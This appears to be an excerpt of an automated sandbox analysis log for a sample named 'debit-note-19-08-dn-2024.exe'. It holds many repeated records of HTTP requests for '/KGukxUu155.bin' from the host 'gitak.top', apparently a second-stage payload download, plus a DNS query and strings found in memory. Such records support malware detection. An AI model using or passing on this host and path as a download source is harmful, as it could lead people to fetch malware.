Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: gitak.top

Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000000.00000000.10626867806.0000000000409000.00000008.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000000.10746285611.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: debit-note-19-08-dn-2024.exe, 00000002.00000001.10747980655.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
